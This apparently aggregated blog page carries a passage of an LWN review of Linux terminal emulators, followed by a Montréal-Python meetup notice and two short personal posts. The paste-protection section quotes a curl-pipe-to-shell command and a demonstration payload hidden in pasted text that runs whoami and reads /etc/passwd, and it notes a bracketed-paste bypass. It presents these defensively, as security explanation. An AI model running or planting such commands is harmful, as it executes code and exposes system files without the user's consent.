Many terminals fail this test: Alacritty, VTE-derivatives (GNOME Terminal, Terminator, and XFCE Terminal), urxvt, st, and xterm all show Sarah's name backwards—as if we would display it as "Haras" in English.

The other challenge with bi-directional text is how to align it, especially mixed RTL and left-to-right (LTR) text. RTL scripts should start from the right side of the terminal, but what should happen in a terminal where the prompt is in English, on the left? Most terminals do not make special provisions and align all of the text on the left, including Konsole, which otherwise displays Sarah's name in the right order. Here, pterm and mlterm seem to be sticking to the standard a little more closely and align the test string on the right.

Paste protection

The next critical feature I have identified is paste protection. While it is widely known that incantations like:

$ curl http://example.com/ | sh

are arbitrary code execution vectors, a less well-known vulnerability is that hidden commands can sneak into copy-pasted text from a web browser, even after careful review. Jann Horn's test site brilliantly shows how the apparently innocuous command: git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

gets turned into this nasty mess (reformatted a bit for easier reading) when pasted from Horn's site into a terminal:

git clone /dev/null; clear; echo -n "Hello "; whoami|tr -d '\n'; echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust! \ Here'"'"'s the first line of your /etc/passwd: '; head -n1 /etc/passwd git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

This works by hiding the evil code in a <span> block that's moved out of the viewport using CSS.

Bracketed paste mode is explicitly designed to neutralize this attack. In this mode, terminals wrap pasted text in a pair of special escape sequences to inform the shell of that text's origin. The shell can then ignore special editing characters found in the pasted text. Terminals going all the way back to the venerable xterm have supported this feature, but bracketed paste also needs support from the shell or application running on the terminal. For example, software using GNU Readline (e.g. Bash) needs the following in the ~/.inputrc file:

set enable-bracketed-paste on

Unfortunately, Horn's test page also shows how to bypass this protection, by including the end-of-pasted-text sequence in the pasted text itself, thus ending the bracketed mode prematurely. This works because some terminals do not properly filter escape sequences before adding their own. For example, in my tests, Konsole fails to properly escape the second test, even with .inputrc properly configured. That means it is easy to end up with a broken configuration, either due to an unsupported application or misconfigured shell. This is particularly likely when logged on to remote servers where carefully crafted configuration files may be less common, especially if you operate many different machines.

A good solution to this problem is the confirm-paste plugin of the urxvt terminal, which simply prompts before allowing any paste with a newline character. I haven't found another terminal with such definitive protection against the attack described by Horn.

Tabs and profiles

A popular feature is support for a tabbed interface, which we'll define broadly as a single terminal window holding multiple terminals. This feature varies across terminals: while traditional terminals like xterm do not support tabs at all, more modern implementations like Xfce Terminal, GNOME Terminal, and Konsole all have tab support. Urxvt also features tab support through a plugin. But in terms of tab support, Terminator takes the prize: not only does it support tabs, but it can also tile terminals in arbitrary patterns (as seen at the right).

Another feature of Terminator is the capability to "group" those tabs together and to send the same keystrokes to a set of terminals all at once, which provides a crude way to do mass operations on multiple servers simultaneously. A similar feature is also implemented in Konsole. Third-party software like Cluster SSH, xlax, or tmux must be used to have this functionality in other terminals.

Tabs work especially well with the notion of "profiles": for example, you may have one tab for your email, another for chat, and so on. This is well supported by Konsole and GNOME Terminal; both allow each tab to automatically start a profile. Terminator, on the other hand, supports profiles, but I could not find a way to have specific tabs automatically start a given program. Other terminals do not have the concept of "profiles" at all.

Eye candy

The last feature I considered is the terminal's look and feel. For example, GNOME, Xfce, and urxvt support transparency, background colors, and background images. Terminator also supports transparency, but recently dropped support for background images, which made some people switch away to another tiling terminal, Tilix. I am personally happy with only a Xresources file setting a basic color set (Solarized) for urxvt. Such non-standard color themes can create problems however. Solarized, for example, breaks with color-using applications such as htop and IPTraf.

While the original VT100 terminal did not support colors, newer terminals usually did, but were often limited to a 256-color palette. For power users styling their terminals, shell prompts, or status bars in more elaborate ways, this can be a frustrating limitation. A Gist keeps track of which terminals have "true color" support. My tests also confirm that st, Alacritty, and the VTE-derived terminals I tested have excellent true color support. Other terminals, however, do not fare so well and actually fail to display even 256 colors. You can see below the difference between true color support in GNOME Terminal, st, and xterm, which still does a decent job at approximating the colors using its 256-color palette. Urxvt not only fails the test but even shows blinking characters instead of colors.

Some terminals also parse the text for URL patterns to make them clickable. This is the case for all VTE-derived terminals, while urxvt requires the matcher plugin to visit URLs through a mouse click or keyboard shortcut. Other terminals reviewed do not display URLs in any special way.

Finally, a new trend treats scrollback buffers as an optional feature. For example, st has no scrollback buffer at all, pointing people toward terminal multiplexers like tmux and GNU Screen in its FAQ. Alacritty also lacks scrollback buffers but will add support soon because there was "so much pushback on the scrollback support". Apart from those outliers, every terminal I could find supports scrollback buffers.

Preliminary conclusions

In the next article, we'll compare performance characteristics like memory usage, speed, and latency of the terminals. But we can already see that some terminals have serious drawbacks. For example, users dealing with RTL scripts on a regular basis may be interested in mlterm and pterm, as they seem to have better support for those scripts. Konsole gets away with a good score here as well. Users who do not normally work with RTL scripts will also be happy with the other terminal choices.

In terms of paste protection, urxvt stands alone above the rest with its special feature, which I find particularly convenient. Those looking for all the bells and whistles will probably head toward terminals like Konsole. Finally, it should be noted that the VTE library provides an excellent basis for terminals to provide true color support, URL detection, and so on. So at first glance, the default terminal provided by your favorite desktop environment might just fit the bill, but we'll reserve judgment until our look at performance in the next article.

This article first appeared in the Linux Weekly News.

Catégories: External Blogs

Montréal-Python 70 - Atomic Zucchini

Montreal Python - mar, 03/27/2018 - 23:00

It is with pleasure that we announce the presentations of our 70th meetup. Unexpected events forced us to postpone last month's meetup. But don't worry, we are back in force with a menu full of python delights!

Thanks to Shopify for sponsoring this event by providing the venue and pizza!

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 7:30PM - Break
  • 7:45PM - Presentations
  • 9:00PM - End of the event
  • 9:15PM - Benelux
Presentations SikuliX: automatise tout ce que tu vois avec 1 seul outil (Windows, Mac, Linux) - Dominik Seelos

SikuliX est un outtils d’automation qui nous permet de scripter (en python 2.7) des tâches récursives avec très très peu d’expérience en automation. SikuliX fonctionne par reconnaissance d’image et peut faire tout ce qu’un clavier souris peuvent (Windows, Mac et Linux)

Automate All The Things with Home Assistant - Philippe Gauthier Passeriez-vous une entrevue de data scientist junior? - Nicolas Coallier

Démontrer les modules et le niveau en python nécessaire pour être embaucher à titre de data scientist junior dans une entreprise. Nous avons un test interne en python que nous faisons passer lors des entrevues. Je passerai à travers le test qui contient les réponses.

Modules abordés: Pandas, Numpy, Sklearn, Beatufiulsoup, re... Théorie ML abordé: Classification, Segmentation, LSTM, Boosting Autres volets abordé: Scrapping, NLP , structure des données

When

Monday, April 9th, 2018 at 6h00PM

Where

Shopify, 490 rue de la Gauchetière Montréal, Québec

Catégories: External Blogs

Epic Lameness

Eric Dorland - lun, 09/01/2008 - 17:26
SF.net now supports OpenID. Hooray! I'd like to make a comment on a thread about the RTL8187se chip I've got in my new MSI Wind. So I go to sign in with OpenID and instead of signing me in it prompts me to create an account with a name, username and password for the account. Huh? I just want to post to their forum, I don't want to create an account (at least not explicitly, if they want to do it behind the scenes fine). Isn't the point of OpenID to not have to create accounts and particularly not have to create new usernames and passwords to access websites? I'm not impressed.
Catégories: External Blogs

Sentiment Sharing

Eric Dorland - lun, 08/11/2008 - 23:28
Biella, I am from there and I do agree. If I was still living there I would try to form a team and make a bid. Simon even made noises about organizing a bid at DebConfs past. I wish he would :)

But a DebConf in New York would be almost as good.
Catégories: External Blogs
Syndiquer le contenu